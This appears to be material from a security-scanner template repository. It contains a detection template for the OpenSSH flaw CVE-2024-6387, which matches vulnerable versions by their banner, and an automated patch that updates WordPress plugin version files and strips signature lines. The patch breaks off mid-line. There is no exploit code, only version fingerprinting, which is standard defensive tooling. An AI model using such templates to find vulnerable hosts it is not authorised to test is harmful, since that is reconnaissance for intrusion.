classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2024-6387 - cwe-id: CWE-287 - epss-score: 0.05 - epss-percentile: 0.95 - cpe: cpe:2.3:a:ssh:ssh:8.5:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ssh - product: ssh - tags: network,cve2024,cve,ssh,openssh,tcp - -tcp: - - host: - - "{{Hostname}}" - port: 22 - inputs: - - data: "SSH-2.0-ExampleClientStaticTest" - matchers: - - type: regex - regex: - - "SSH-2\\.0-OpenSSH_8\\.[5-9]" - - "SSH-2\\.0-OpenSSH_9\\.[0-7]" - part: data From 064ae930b178ebf68b310e409eb41a3c4288a18e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Jul 2024 00:20:16 +0000 Subject: [PATCH 034/247] Auto WordPress Plugins Update [Thu Jul 11 00:20:16 UTC 2024] :robot: --- helpers/wordpress/plugins/akismet.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/forminator.txt | 2 +- helpers/wordpress/plugins/jetpack-boost.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/royal-elementor-addons.txt | 2 +- helpers/wordpress/plugins/seo-by-rank-math.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/shortcodes-ultimate.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/wp-super-cache.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 3 +-- http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 211 files changed, 12 insertions(+), 212 deletions(-) diff --git a/helpers/wordpress/plugins/akismet.txt b/helpers/wordpress/plugins/akismet.txt index ba09cfd650d..3884b9bcd93 100644 --- a/helpers/wordpress/plugins/akismet.txt +++ b/helpers/wordpress/plugins/akismet.txt @@ -1 +1 @@ -5.3.2 \ No newline at end of file +5.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 9b7a431d9ff..448ada3bdaf 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.2.4 \ No newline at end of file +3.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 860251185a2..f0fed9186c9 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.32.0 \ No newline at end of file +1.33.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index 4b4ea1b6883..81f1b89fea7 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -3.4.6 \ No newline at end of file +3.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index d667599f263..7f5db23d1c0 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.36 \ No newline at end of file +4.10.37 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index 5a34f27cf42..02922966cf4 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.979 \ No newline at end of file +1.3.980 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index eeb28206059..548ceff894f 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.222 \ No newline at end of file +1.0.223 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index bbd8e9206ee..6e218b78e5d 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.6.1 \ No newline at end of file +7.6.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortcodes-ultimate.txt b/helpers/wordpress/plugins/shortcodes-ultimate.txt index 0e5aa899e02..468c41f93cc 100644 --- a/helpers/wordpress/plugins/shortcodes-ultimate.txt +++ b/helpers/wordpress/plugins/shortcodes-ultimate.txt @@ -1 +1 @@ -7.1.8 \ No newline at end of file +7.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 72dfaf16505..84c5308f033 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -7.8.1 \ No newline at end of file +7.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt index 69669de6982..c56eaaaf456 100644 --- a/helpers/wordpress/plugins/wp-super-cache.txt +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -1 +1 @@ -1.12.2 \ No newline at end of file +1.12.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 9217fea241b..3fd2256749a 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000b1e46493e43063d51c2adedbdc60f54cf093a7667c5fc01ee38ea82c8f9e28022100b3f3d955b2c1ff2e60446258eea31b80991f61fde04d34f314e495daa7299f3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 668bc840489..6a0d344b632 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220690a0f8a3f72d97ea9fc4fca292474308b5907e823f5878d70f590362ba7c3a9022060ed54e1fc4331b08804676916169e3e3e5cc96f992c834db926cdba45608865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index a44f2864b13..6fb5080bc80 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207c05a512c903aaecc2c4df6769175f7af14cd5856a0a6bc280f8423be5d04fe702200a41e88fd5bbe2bbd4dad978502abf4da67d2247e4eaa0a28b9425e9f6369ff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index ffdae6908ed..cddbb4bb2ed 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a7a9d880c3237ba183dec9475c44fcf221f17f08316030fec5e107957f0516d9022100e58f78775f0451b13ea863e0870d382baba32efc77567e21a0e56b24ed67dbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 8ba8e3639ed..6f253f9f556 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220107aa75b8f3f11fd71081c510be9a9e420e8eef397d99cefebf5f341d134bbdd02207ca682994f9da63f67d1a905267675e0e7166efcec9d2a7d5f4eba377de006b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 739b838e052..fe45de4d042 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e1e84d65aa74e3e0e2d47d555702218883cd86f71dc2655b475a7d1a2f03b000221009be3cb9e75aa59678f5cb5bf4da749d3e7fcbec8f227c6bb94b4a0167f393144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 6368040c9a9..69e425f4469 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d6774e49fd08067b7e090fd0be6d18800ed9b9e8d122a6c40c6ff40a1fabf07022100c95ea174d2cb196ebf350b575921b1222e1ffe4a2e0d7fb6f82938620054223e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 25b575c5b19..9c07c65e4e6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220554e34006563dd08d4bcfb4b6a177313b6dc9e00e93b94a3f2b705f3d9fdab9d022007ebf1febb018f7be01c9e7c5d56a7cae2cb6405c8d9c1bb7e5b44d83037b136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index e7aee6e832c..92c8f5656e9 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d263e57577806079fd4a261f119ffac6828bceed19c77a674088f40427c3bf3022100e893ea2eb3186d869765d6b76d7fdad61903375b849e4b75a7175af1be1c1c25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e07510a2c25..70975a19a1f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f565ce787f4d311b9c5320a6321159348b77c0d102a60ec300839840ed433c0022100c824e6676f256917fbd100afd2490982ab89a348da052b7361b0d5fe9cfd9b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 7cadd9619e1..fd7e3e99dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203558201bb4dd5a68db7b2e7d602573f62c87a6bb7b0dc3eab0b3c218a3a0d7d9022024209e4f6c9cd8e71f948f3289d3c10a426e527d636d626679c5990c99bcf44e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 3e6e74325ba..18f2a2ae84c 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220426dfa2854b9c515c2d04fb05531249a635290b37bb3f2b0b9d0b41d6cb942210220538bd278c316356434e1687def9ce0518529b2983ebb6eaf7288c5c882ed1429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 036128a1976..11cb41fb2ce 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008405bf7bae9c61712b07587a009c640019a17084ad48f93b555cd07ca85592e502205d95f8d7ce3e008715d184dfb97c13c91d765124439b1a50f81140aca0cb5b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 689bf1faeb6..df3c5f3a944 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b2c2ce1341c322cb29182feed85d5d1f7b0e55687a730b28ce427ab1554fe9b022100f97ef973f20e7045fb61e477c12dee7761edc8413bdda39e895633a5f4d221b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index bf31e9872b9..6a50e049dca 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022042587514e139ec00607edd73ac20ecac6f755a9939690fe95a123c2e489ae0a4022100e256542c51ae86808cce5e906cbcf75261890aac2b43a496a6677fd91f7d5384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 4f477a6b139..e5326941673 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd13f57f68e2e7d39e6e81d799badf14c7d5cb1e2dd43ff6f8648ddeca59e69e022100a5e4bfafcc7e25e461114386ac9a56b523f445b4549dd7bcbc4587ccd2773d67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c9351b108f6..4c6e616c1d6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a817969965da711e8b60cf0433f9b44e7ab0c64d7aac347d35cb862ab0e1c19402207b79e6ab056a3ebfa84d515fb82bf241b28fe73e10c9f5e64881e1291a52435e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 7baa8305af5..a70a58690c3 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad3f68b686fa910c306265456f00fe58341e0cf1f52a1ffa3d790299703febc50221008cb55552d595d907151402ff48ed136a022f0bd38aefc70feaf633630ca40464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 757bbc1f4f0..4e3c68c53a3 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200cb1b0d3800d9d608217ff825e81f39b085e6bd9139139fcbf073f2d891554b3022100e8cb0eb2814a8ec69321b6ec656863888fecc6a702d12c885017d1ee7106ca6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml 